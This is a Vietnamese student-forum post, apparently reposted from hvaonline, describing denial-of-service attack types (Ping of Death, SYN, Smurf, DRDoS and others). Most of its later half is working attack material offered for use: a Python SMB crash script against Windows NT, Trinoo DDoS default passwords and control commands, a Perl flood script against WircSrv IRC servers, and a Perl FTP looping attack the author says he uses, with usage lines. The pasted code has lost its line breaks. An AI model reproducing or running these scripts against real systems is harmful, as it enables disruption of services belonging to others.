Diễn đàn của Lớp Cao Đẳng Điện Tử Viễn Thông 10A - Trường Cao Đẳng Kỹ Thuật Cao Thắng
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.
Diễn đàn của Lớp Cao Đẳng Điện Tử Viễn Thông 10A - Trường Cao Đẳng Kỹ Thuật Cao Thắng

Diễn Đàn Chia Sẻ, Tổng Hợp Kiến Thức Chuyên Nghành Điện Tử Viễn Thông - Tin Học và Giải Trí, Nơi Giao Lưu, Chia Sẻ Kiến Thức, Kinh Nghiệm Học Tập Với Bạn Bè, Thế Giới Dành Cho Mọi Người...

Trả lờiTổng Hợp Một Số Tài Liệu Học Lập Trình Và Ví Dụ Về PIC 16f877a(full) - 102 Trả lời
Trả lờiTổng hợp bài tập thực hành vi xử lý pic16f877a của Trường CĐKT Cao Thắng - 69 Trả lời
Trả lờiTổng hợp Ví dụ Proteus cho PIC 16F877A FULL - 58 Trả lời
Trả lờiTổng Hợp Một Số Tài Liệu Học Lập Trình PIC - 40 Trả lời
Trả lời[ĐATN]Hệ thống báo động an ninh dùng 16f8877 điều khiển bằng phần mềm FULL - 37 Trả lời
Trả lời[ĐATN ] Mô hình ngôi nhà tự động - 23 Trả lời
Trả lời[ĐATN ] Thiết kế và thi công máy phát sóng FM - 20 Trả lời
Trả lời[ĐATN ] Giao tiếp máy tính điều khiển thiết bị điện trong nhà - 18 Trả lời
Trả lời[ĐATN ] Thiết kế và thi công tổng đài điện thoại - 16 Trả lời
Trả lời[Fiction] Hãy chờ em đánh răng xong nhé ! - 16 Trả lời
Lượt xemTổng Hợp Một Số Tài Liệu Học Lập Trình Và Ví Dụ Về PIC 16f877a(full) - 11209 Xem
Lượt xemGhost Windows 7 đa cấu hình ( All PC + Laptop ) Full Soft 32 bit - 10598 Xem
Lượt xemCCS - phần mềm lập trình - Hướng dẫn cài đặt và sử dụng CCS (PIC C Compiler) - 10380 Xem
Lượt xemSHARE tài khoản Premium up.4share.vn & fshare.vn lớn nhất! - 10374 Xem
Lượt xemPhần mềm vẽ mạch Proteus 7.8 SP2 Full New - 10353 Xem
Lượt xemStep 7 MicroWin V 5.5 Bản cài trên Win 7 Đã Test va chạy tốt. Phần mềm lập trình PLC - 10278 Xem
Lượt xemEasy DriverPack 5.2.5.5 – Bộ cài Driver tự động cho mọi loại máy tính ! - 9723 Xem
Lượt xemTổng hợp bài tập thực hành vi xử lý pic16f877a của Trường CĐKT Cao Thắng - 9119 Xem
Lượt xem IObit Advanced SystemCare 5 PRO + key.Bản quyền nhá! - 8779 Xem
Lượt xemTổng hợp các Game hay cho mọi máy tính ( Nhẹ và hay ) ! - 7736 Xem
THÔNG BÁO ĐẾN TẤT CẢ MỌI NGƯỜI

KỂ TỪ NGÀY 1/7/2013 TRANG WEB CHÍNH THỨC NGƯNG HOẠT ĐỘNG VÀ SẼ KHÔNG CHO ĐĂNG KÝ THÀNH VIÊN , KHÔNG HỖ TRỢ QUA MAIL HAY ĐIỆN THOẠI NỮA MÌNH VẪN SẼ ĐỂ NGUYÊN HIỆN TRẠNG TRANG WEB CHO CÁC THÀNH VIÊN CŨ VÀO TÌM LẠI TÀI LIỆU VÀ COI NHƯ LÀ KỈ NIỆM GÌ ĐÓ CHO MÌNH. Các tài liệu thì là của chung mọi người tùy ý sử dụng.
Cám ơn mọi người đã ghé thăm trong suốt thời gian qua , chúc tất cả mọi người thành công trong cuộc sống và trên con đường mình chọn nhé !
p/s: Nguyễn Phát
ADBLOCK
DIỄN ĐÀN KHUYÊN DÙNG ADBLOCK ĐỂ CHẶN QUẢNG CÁO TRÊN MỌI TRANG WEB !
GOOD WEBSITE FOR ELECTRONIC
WEB ĐIỆN TỬ HAY CHIPKOOL.NET ! minhdt3k/ !

You are not connected. Please login or register

Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down Thông điệp [Trang 1 trong tổng số 1 trang]

AdminTên: Admin
Cấp bậc: Nguyễn Phát -Người Điều Hành
Nguyễn Phát -Người Điều Hành

Bài viết: 1Các kiểu tấn công Dos (Tham khảo) Empty Các kiểu tấn công Dos (Tham khảo) Wed Aug 01, 2012 6:26 pm

Loading
TẤN CÔNG TỪ CHỐI DỊCH VỤ -DOS ATTACH
Các kiểu tấn công Dos (Tham khảo)

Các kiểu tấn công Dos (Tham khảo) Images?q=tbn:ANd9GcQFWzzlEBKRF7nvHlhH46X6xSA2TJRMN08U_KIaRrQ739bB-q36

Nếu thường xuyên theo dõi tin tức công nghệ thì bạn sẽ dễ dàng bắt gặp được các vụ tấn công Web bằng DDos như trường hợp của hvaonline , bkav,...
Nếu là một quản trị một trang Web thì khi bị tấn công Dos thì bạn sẽ làm gì ? Những kiến thức cơ bản sẽ giúp bạn dễ hình dung được ra loại tấn công và tìm được giải pháp khắc phục !

Trước khi đọc bài này, mình xin lưu ý rằng,bài này nhằm mục đích tham khảo, nếu có sự cố gì xảy ra, mình không chịu trách nhiệm
38 . ) DoS attack là gì ? ( Denial Of Services Attack )

_ DoS attack ( dịch là tấn công từ chối dịch vụ ) là kiểu tấn công rất lợi hại , với loại tấn công này , bạn chỉ cần một máy tính kết nối Internet là đã có thể thực hiện việc tấn công được máy tính của đốI phương . thựcchất của DoS attack là hacker sẽ chiếm dụng một lượng lớn tài nguyên trênserver ( tài nguyên đó có thể là băng thông, bộ nhớ, cpu, đĩa cứng, ... ) làmcho server không thể nào đáp ứng các yêu cầu từ các máy của nguời khác ( máycủa những người dùng bình thường ) và server có thể nhanh chóng bị ngừnghoạt động, crash hoặc reboot .
39 . ) Các loại DoS attack hiện đang được biết đến và sử dụng :

a . ) Winnuke :
_DoS attack loại này chỉ có thể áp dụng cho các máy tính đang chạy Windows9x .Hacker sẽ gởi các gói tin với dữ liệu "Out of Band" đến cổng 139 của máy tínhđích.( Cổng 139 chính là cổng NetBIOS, cổng này chỉ chấp nhận các gói tin cócờ Out of Band được bật ) . Khi máy tính của victim nhận được gói tin này,một màn hình xanh báo lỗi sẽ được hiển thị lên với nạn nhân do chươngtrình của Windows nhận được các gói tin này nhưng nó lại không biết phản ứngvới các dữ liệu Out Of Band như thế nào dẫn đến hệ thống sẽ bị crash .

b . ) Ping of Death :
_ Ở kiểu DoS attack này , ta chỉ cần gửi một gói dữ liệu có kích thước lớnthông qua lệnh ping đến máy đích thì hệ thống của họ sẽ bị treo . _ VD : ping –l 65000

c . ) Teardrop :
_ Như ta đã biết , tất cả các dữ liệu chuyển đi trên mạng từ hệ thốngnguồn đến hệ thống đích đều phải trải qua 2 quá trình : dữ liệu sẽđược chia ra thành các mảnh nhỏ ở hệ thống nguồn, mỗi mảnh đều phải cómột giá trị offset nhất định để xác định vị trí của mảnh đó trong góidữ liệu được chuyển đi. Khi các mảnh này đến hệ thống đích, hệ thốngđích sẽ dựa vào giá trị offset để sắp xếp các mảnh lại với nhau theo thứtự đúng như ban đầu . Lợi dụng sơ hở đó , ta chỉ cần gởi đến hệ thốngđích một loạt gói packets với giá trị offset chồng chéo lên nhau. Hệ thốngđích sẽ không thể nào sắp xếp lại các packets này, nó không điều khiểnđược và có thể bị crash, reboot hoặc ngừng hoạt động nếu số lượng gói packets với giá trị offset chồng chéo lên nhau quá lớn !

d . ) SYN Attack :
_ Trong SYN Attack, hacker sẽ gởi đến hệ thống đích một loạt SYN packets với địa chỉ ip nguồn không có thực. Hệ thống đích khi nhận được các SYN packetsnày sẽ gởi trở lại các địa chỉ không có thực đó và chờ đợI để nhậnthông tin phản hồi từ các địa chỉ ip giả . Vì đây là các địa chỉ ip khôngcó thực, nên hệ thống đích sẽ sẽ chờ đợi vô ích và còn đưa các "request"chờ đợi này vào bộ nhớ , gây lãng phí một lượng đáng kể bộ nhớ trênmáy chủ mà đúng ra là phải dùng vào việc khác thay cho phải chờ đợi thông tin phản hồi không có thực này . Nếu ta gởi cùng một lúc nhiều gói tin có địachỉ IP giả như vậy thì hệ thống sẽ bị quá tải dẫn đến bị crash hoặc boot máy tính . == > ném đá dấu tay

e . ) Land Attack :
_ Land Attack cũng gần giống như SYN Attack, nhưng thay vì dùng các địa chỉ ipkhông có thực, hacker sẽ dùng chính địa chỉ ip của hệ thống nạn nhân. Điềunày sẽ tạo nên một vòng lặp vô tận giữa trong chính hệ thống nạn nhân đó,giữa một bên cần nhận thông tin phản hồi còn một bên thì chẳng bao giờ gởithông tin phản hồi đó đi cả . == > Gậy ông đập lưng ông .

f . ) Smurf Attack :
_Trong Smurf Attack, cần có ba thành phần: hacker (người ra lệnh tấn công), mạngkhuếch đại (sẽ nghe lệnh của hacker) và hệ thống của nạn nhân. Hacker sẽgởi các gói tin ICMP đến địa chỉ broadcast của mạng khuếch đại. Điều đặc biệt là các gói tin ICMP packets này có địa chỉ ip nguồn chính là địa chỉ ipcủa nạn nhân . Khi các packets đó đến được địa chỉ broadcast của mạngkhuếch đại, các máy tính trong mạng khuếch đại sẽ tưởng rằng máy tính nạnnhân đã gởi gói tin ICMP packets đến và chúng sẽ đồng loạt gởi trả lại hệthống nạn nhân các gói tin phản hồi ICMP packets. Hệ thống máy nạn nhân sẽkhông chịu nổi một khối lượng khổng lồ các gói tin này và nhanh chóng bịngừng hoạt động, crash hoặc reboot. Như vậy, chỉ cần gởi một lượng nhỏcác gói tin ICMP packets đi thì hệ thống mạng khuếch đại sẽ khuếch đạilượng gói tin ICMP packets này lên gấp bộI . Tỉ lệ khuếch đại phụ thuộc vàosố mạng tính có trong mạng khuếch đạI . Nhiệm vụ của các hacker là cốchiếm được càng nhiều hệ thống mạng hoặc routers cho phép chuyển trực tiếpcác gói tin đến địa chỉ broadcast không qua chỗ lọc địa chỉ nguồn ở cácđầu ra của gói tin . Có được các hệ thống này, hacker sẽ dễ dàng tiến hànhSmurf Attack trên các hệ thống cần tấn công . == > một máy làm chẳng si nhê ,chục máy chụm lại ta đành chào thua .

g . ) UDP Flooding :
_ Cách tấn công UDP đòi hỏi phải có 2 hệ thống máy cùng tham gia. Hackers sẽlàm cho hệ thống của mình đi vào một vòng lặp trao đổi các dữ liệu qua giaothức UDP. Và giả mạo địa chỉ ip của các gói tin là địa chỉ loopback (127.0.0.1 ) , rồi gởi gói tin này đến hệ thống của nạn nhân trên cổng UDP echo( 7 ). Hệ thống của nạn nhân sẽ trả lời lại các messages do 127.0.0.1( chính nó ) gởi đến , kết quả là nó sẽ đi vòng một vòng lặp vô tận. Tuy nhiên, cónhiều hệ thống không cho dùng địa chỉ loopback nên hacker sẽ giả mạo mộtđịa chỉ ip của một máy tính nào đó trên mạng nạn nhân và tiến hành ngậplụt UDP trên hệ thống của nạn nhân . Nếu bạn làm cách này không thành côngthì chính máy của bạn sẽ bị đấy .

h . ) Tấn công DNS :
_ Hacker có thể đổi một lối vào trên Domain Name Server của hệ thống nạn nhânrồi cho chỉ đến một website nào đó của hacker. Khi máy khách yêu cầu DNS phântích địa chỉ bị xâm nhập thành địa chỉ ip, lập tức DNS ( đã bị hacker thayđổi cache tạm thờI ) sẽ đổi thành địa chỉ ip mà hacker đã cho chỉ đếnđó . Kết quả là thay vì phải vào trang Web muốn vào thì các nạn nhân sẽ vàotrang Web do chính hacker tạo ra . Một cách tấn công từ chối dịch vụ thật hữuhiệu !.

g . ) Distributed DoS Attacks ( DDos ) :
_ DDoS yêu cầu phải có ít nhất vài hackers cùng tham gia. Đầu tiên các hackers sẽcố thâm nhập vào các mạng máy tính được bảo mật kém, sau đó cài lên cáchệ thống này chương trình DDoS server. Bây giờ các hackers sẽ hẹn nhau đếnthời gian đã định sẽ dùng DDoS client kết nối đến các DDoS servers, sau đóđồng loạt ra lệnh cho các DDoS servers này tiến hành tấn công DDoS đến hệthống nạn nhân .

h . ) DRDoS ( The Distributed Reflection Denial of Service Attack ) : _ Đây có lẽ là kiểu tấn công lợi hại nhất và làm boot máy tính của đối phương nhanh gọn nhất . Cách làm thì cũng tương tự như DDos nhưng thay vì tấncông bằng nhiều máy tính thì ngườI tấn công chỉ cần dùng một máy tấn côngthông qua các server lớn trên thế giới . Vẫn với phương pháp giả mạo địachỉ IP của victim , kẻ tấn công sẽ gởi các gói tin đến các server mạnh nhất, nhanh nhất và có đường truyền rộng nhất như Yahoo .v.v… , các server này sẽ phản hồi các gói tin đó đến địa chỉ của victim . Việc cùng một lúc nhậnđược nhiều gói tin thông qua các server lớn này sẽ nhanh chóng làm nghẽnđường truyền của máy tính nạn nhân và làm crash , reboot máy tính đó . Cáchtấn công này lợi hại ở chỗ chỉ cần một máy có kết nối Internet đơn giảnvới đường truyền bình thường cũng có thể đánh bật được hệ thống cóđường truyền tốt nhất thế giớI nếu như ta không kịp ngăn chặn . Trang WebHVA của chúng ta cũng bị DoS vừa rồi bởi cách tấn công này đấy .

40 . ) Kỹ thuật DoS Web bằng Python : _ Kỹ thuật này chỉ có thể sử dụng duy nhất trên WinNT , và bạn cần phải cóthời gian thì máy tính của nạn nhân mới bị down được . _ Bạn hãy download Pyphon tại http://www.python.org/ để sử dụng

Bạn hãy save đoạn mã sau lên file rfpoison.py .

Code:
CODE

import stringimport structfrom socket import *import sysdef a2b(s): bytes = map(lambda x: string.atoi(x, 16),string.split(s))data = string.join(map(chr, bytes), '')return datadef b2a(s): bytes = map(lambda x: '%.2x' % x, map(ord, s))return string.join(bytes, ' ')# Yêu cầu tập hợp NBSSnbss_session = a2b("""81 00 00 48 20 43 4b 46 44 454e 45 43 46 44 45 46 46 43 46 47 45 46 46 43 4341 43 41 43 41 43 41 43 41 43 41 00 20 45 48 4542 46 45 45 46 45 4c 45 46 45 46 46 41 45 46 4643 43 41 43 41 43 41 43 41 43 41 41 41 00 00 0000 00""")# Tạo SMBcrud = (# Yêu cầu SMBnegprot"""ff 53 4d 42 72 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 4320 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 204e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 3000 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00""",# Yêu cầu setup SMB X"""ff 53 4d 42 73 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ff ff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 0000 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f 55 50 00 55 6e 69 78 00 53 61 6d 62 61 00""",# Yêu cầu SMBtconX"""ff 53 4d 42 75 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 0000 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 5645 52 5c 49 50 43 24 00 49 50 43 00""",# Yêu cầu khởI tạo SMBnt X"""ff 53 4d 42 a2 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 0007 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 0000 00 00 00 00 00 00 00 00 00 03 00 00 00 01 0000 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 7276 73 76 63 00""",# yêu cầu biên dịch SMB"""ff 53 4d 42 25 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 0000 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 4950 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 0000 00 01 00 00 00 30 16 30 16 00 00 00 00 01 0000 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 785a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1cc9 11 9f e8 08 00 2b 10 48 60 02 00 00 00""",# SMBtrans Request"""ff 53 4d 42 25 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 0000 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 4950 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 0000 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 0000 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 00 5c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 0056 00 45 00 52 00 00 00 00 00 01 00 00 00 01 0000 00 00 00 00 00 ff ff ff ff 00 00 00 00""")crud = map(a2b, crud)def smb_send(sock, data, type=0, flags=0):d = struct.pack('!BBH', type, flags, len(data))#print 'send:', b2a(d+data)sock.send(d+data)def smb_recv(sock):s = sock.recv(4)assert(len(s) == 4)type, flags, length = struct.unpack('!BBH', s)data = sock.recv(length)assert(len(data) == length)#print 'recv:', b2a(s+data)return type, flags, datadef nbss_send(sock, data):sock.send(data)def nbss_recv(sock):s = sock.recv(4)assert(len(s) == 4)return sdef main(host, port=139):s = socket(AF_INET, SOCK_STREAM)s.connect(host, port)nbss_send(s, nbss_session)nbss_recv(s)for msg in crud[:-1]:smb_send(s, msg)smb_recv(s)smb_send(s, crud[-1]) # no response to thiss.close()if __name__ == '__main__': print 'Sending poison...',main(sys.argv[1]) print 'done.'

Để có thể làm down được server của đối phương bạn cần phải có thời gianDoS , nếu không có điều kiện chờ đợi tốt nhất bạn không nên sử dụng cách này .

41 . ) Tấn công DDoS thông qua Trinoo :
_ Bạn đã biết DDoS attack là gì rồi phải không ? Một cuộc tấn công DDoS bằngTrinoo được thực hiện bởi một kết nối của Hacker Trinoo Master và chỉ dẫncho Master để phát động một cuộc tấn công DDoS đến một hay nhiều mục tiêu.Trinoo Master sẽ liên lạc với những Deadmons đưa những địa chỉ được dẫnđến để tấn công một hay nhiều mục tiêu trong khoảng thời gian xác định .
_ Cả Master và Deamon đều được bảo vệ bằng Passwd . chỉ khi chúng ta biết passwd thì mới có thể điều khiển được chúng , điều này không có gì khókhăn nếu chúng ta là chủ nhân thực sự của chúng . Những passwd này thườngđược mã hoá và bạn có thể thiết lập khi biên dịch Trinoo từ Source ----->Binnary. Khi được chạy , Deadmons sẽ hiện ra một dấu nhắc và chờ passwd nhậpvào , nếu passwd nhập sai nó sẽ tự động thoát còn nếu passwd được nhậpđúng thì nó sẽ tự động chạy trên nền của hệ thống

attacker$ telnet 10.0.0.1 27665Trying 10.0.0.1Connected to 10.0.0.1Escape character is '^]'.kwijiboConnection closed by foreign host. < == Bạn đã nhập saiattacker$ telnet 10.0.0.1 27665Trying 10.0.0.1Connected to 10.0.0.1Escape character is '^]'. betaalmostdonetrinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]trinoo> < == bạn đã vào được hệ thống trinoo

_ Đây là vài passwd mặc định :
“l44adsl": pass của trinoo daemon .
"gorave": passwd của trinoo master server khi startup .
"betaalmostdone": passwd điều khiển từ xa chung cho trinoo master ."killme": passwd trinoo master điều khiển lệnh "mdie" .

_ Đây là một số lệnh dùng để điều khiển Master Server:CODE
die-----------------------------------------------------------Shutdown.
quit----------------------------------------------------------Logoff.
mtimer N----------------------------------------------------Đặt thờI gian để tấn côngDoS , vớI N nhận giá trị từ 1--> 1999 giây .
dos IP-------------------------------------------------------Tấn công đến một địa chỉIP xác định .
mdie pass---------------------------------------------------Vô hiệu hoá tất cả cácBroadcast , nếu như passwd chính xác . Một lệnh đưọc gửi tới ("d1e l44adsl")Broadcast để Shutdown chúng . Một passwd riêng biệt sẽ được đặt cho mục này
mping--------------------------------------------------------Gửi một lệnh ping tới ("pngl44adsl") c¸c Broadcast.
mdos ------------------------------------------Send nhiều lênh DOS ("xyz l44adsl123:ip1:ip2") đến các Broadcast.
info-------------------------------------------------------------Hiển thị thông tin vềTrinoo .
msize----------------------------------------------------------Đặt kích thước đệm chonhững gói tin được send đi trong suốt thờI gian DoS.
nslookup host----------------------------------------------Xác định tên thiết bị củaHost mà Master Trinoo đang chạy .
usebackup---------------------------------------------------Chuyển tớI các file Broadcast saolưu được tạo bởi lệnh “killdead”.
bcast-----------------------------------------------------------Liệt kê danh sách tất cảcác Broadcast có thể khai thác .
help [cmd] ---------------------------------------------------Đưa ra danh sách các lệnh .
mstop-----------------------------------------------------------Ngừng lại các cuốc tấncông DOS .

_ Đây là một số lệnh dùng để điều khiển Trinoo Deadmons:
CODE
aaa pass IP----------------------------------------------------Tấn công đến địa chỉ IPđã xác định . GửI gói tin UDP (0-65534) đến cổng của UDP của địa chỉ IP đãxác định trong một khoảng thời gian xác định được mặc định là 120s hay từ1-->1999 s .
bbb pass N-----------------------------------------------------Đặt thờI gian giới hạn chocác cuộc tấn công DOS .
Shi pass--------------------------------------------------------Gửi chuỗi “*HELLO*” tớidánh sách Master Server đã được biên dịch trong chương trình trên cổng31335/UDP.
png pass-------------------------------------------------------Send chuỗi “Pong” tớI Master Server phát hành các lệnh điều khiển trên cổng 31335/UDP.
die pass-------------------------------------------------------Shutdown Trinoo.rsz N-----------------------------------------------------------Là kích thước của bộđệm được dùng để tấn công , nó được tính bằng byte .xyz pass 123:ip1:ip3----------------------------------------tấn công DOS nhiều mục tiêucùng lúc .

42 . ) Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 :
_ WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu như bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port6667.Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667:
Nếu bạn dùng Unix:
[hellme@die-communitech.net$ telnet irc.example.com 6667Trying example.com...Connected to example.com.Escape character is '^]'.[buffer]

Windows cũng tương tự:telnet irc.example.com 6667

Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự .Tuy nhiên , chúng ta sẽ crash nó rất đơn giản bằng đoạn mã sau ( Các bạn hãynhìn vào đoạn mã và tự mình giải mã những câu lệnh trong đó , đó cũng làmột trong những cách tập luyện cho sự phản xạ của các hacker khi họ nghiêncứu .

Nào , chúng ta hãy phân tích nó một cách căn bản ):
CODE
Code:
#!/usr/bin/perl #< == Đoạn mã này cho ta biết là dùng cho các lệnh trong perluse Getopt::Std;use Socket;getopts('s:', \%args);if(!defined($args{s})){&usage;}my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);$foo = "A"; # Đây là NOP$number = "65000"; # Đây là tất cả số NOP$data .= $foo x $number; # kết quả của $foo times $number $serv = $args{s}; # lệnh điều khiển server từ xa$port = 6667; # lệnh điều khiển cổng từ xa , nó được mặc định là 6667$buf = "$data";$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");$proto = getprotobyname('tcp') || die("Error: $!\n");socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");connect(S, $paddr) ||die ("Error: $!");select(S); $| = 1; select(STDOUT); print S "$buf"; print S "$buf"; print("Data has been successfully sent to $serv\n");sub usage {die("\n\n Lỗi WircSrv Version 5.07scó thể tấn công bằng DoS \n gửi 2 64k gói tin đến server làm cho nó crash.\n -s

Tóm lại là vào phần chính đi

44 . ) Kỹ thuật tấn công DoS dễ dàng nhất :
_ Tôi thì mỗi lần muốn tấn công bằng DoS đều dùng chương trình này , nóchẳng kén gì cả và dễ thực hiện . Bây giờ tôi sẽ chia sẻ với các bạn .
_ Bạn cần phải có Activeperl ( lại là activepert ) đã cài sẵn , save đoạn mãsau vào file abc.pl :
CODE
Code:
#!/usr/bin/perluse IO::Socket;sub initiate {if ($ARGV[0] eq '') {die "Usage: perl abc.pl <host> <port> <username> <password>\nVi
du : perlabc.pl 127.0.0.1 21 anonymous me@\n";}$host = $ARGV[0];$port = $ARGV[1];$user = $ARGV[2];$pass = $ARGV[3];};sub connecttoserver { print("Connect den host: $host\n");$socket = IO::Socket::INET->new (PeerAddr => $host,PeerPort => $port,Proto => "tcp",Type => SOCK_STREAM) || die "khong the connect den $host"; print "Connect thanh cong . Loggin vao...\n";};sub login { print "user $user\n"; print $socket "user $user\r\n";$response = <$socket> print "$response\n"; print "pass $pass\n"; print $socket "pass $pass\r\n";$response = <$socket> print "$response\n"; print "Logged in. Dang tan cong DoS doi phuong. Nhan CTRL-C de ngung.\n";};sub doit {for (;; ){ print "retr a:/x\n"; print $socket "retr a:/x\r\n";$response = <$socket> print "$response";}}initiate();connecttoserver();login();doit();

_Nếu bạn từng qua lập trình khi đọc đoạn mã bạn sẽ thấy rằng đoạn mãnày dùng chính thông tin từ ổ đĩa A của nạn nhân để tấn công nạn nhân . Nósử dụng vòng lặp không có giới hạn từ hàm $socket "retr a:/x\r\n" . Khi muốnkết thúc bạn chỉ cần nhấn ctrl+C . _Cuối cùng là bạn chỉ cần gọi nó ra thông qua lệnh perl như các bài trên .
VD: perl abc.pl http://www.xxx.com/ anonymous metrong đó User name và Password có thể là bất kỳ


Nguồn : hvaonline

THAM KHẢO THÊM :

NẾU MUỐN TÌM HIỂU VỀ DOS VÀ DDOS THÌ HÃY XEM TÀI LIỆU NÀY RẤT BỔ ÍCH :

DoS và DDoS toàn tập - Phần I

DoS và DDoS toàn tập – Phần II

FAQ:

Mình thường nghe là tấn công DDos hơn là tấn công Dos vậy 2 cái đó giống hay khác nhau ?

Trả lời:

DoS : Denial of Service
DDoS : Distributed DoS

-DoS là hình thức tấn công từ chối dịch vụ, có nhiều cách để thực hiện tấn công kiểu này (VD : SYN Flooding,..), thực chất là Hacker tận dụng lỗ hổng bảo mật nào đó để yêu cầu Server làm việc "giời ơi" Các kiểu tấn công Dos (Tham khảo) 962561610 nào đó , mục đính là không để Server có khả năng đáp ứng yêu cầu dịch vụ của các Client khác, như vậy gọi là "từ chối dịch vụ" của các Client khác. Thường thì kẻ tấn công là từ một máy.

-
DDoS là một dạng DoS nhưng kẻ tấn công sử dụng nhiều máy để thực hiện.


Sự khác nhau là : DoS là tấn công từ một nguồn còn DDoS là từ nhiều nguồn khác nhau nên phương pháp chống lại cũng khác đôi chút.
VD : nếu phát hiện dấu hiệu của DoS thì chỉ cần tìm và ngắt các hoạt động hoặc kết nối liên quan đến nguồn phát (chỉ 1), còn DDoS thì rất nhiều nguồn tấn công nên không làm như vậy được. Một điểm quan trọng là nếu bị tấn công DDoS thì "chết là cái chắc.

- Khác nhau cơ bản:
+ DoS: 1 vs 1, ai mạnh hơn người đấy thắng Các kiểu tấn công Dos (Tham khảo) 2809362711
+ DDoS: nhiều vs 1 --> thể nào 1 cũng thua Các kiểu tấn công Dos (Tham khảo) 3944589998

TÌM HIỂU THÊM VỀ DDOS VÀ PHÂN LOẠI DDOS:

TẤN CÔNG DDOS VÀ PHẦN LOẠI


VÀ NẾU ĐÃ MUỐN THỬ LÀM HACKER THÌ HÃY NHỚ MỘT CÂU :

Hack là phù du ,ở tù mới đáng nói !

Các kiểu tấn công Dos (Tham khảo) 1929269518

https://vienthong10a-forever.forumvi.com

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang Thông điệp [Trang 1 trong tổng số 1 trang]

Bài viết mới cùng chuyên mục

Bài viết liên quan

Bài viết cùng chuyên mục:

    QUYỀN HẠN CỦA BẠN:
    Bạn không có quyền trả lời bài viết

    Chia sẻ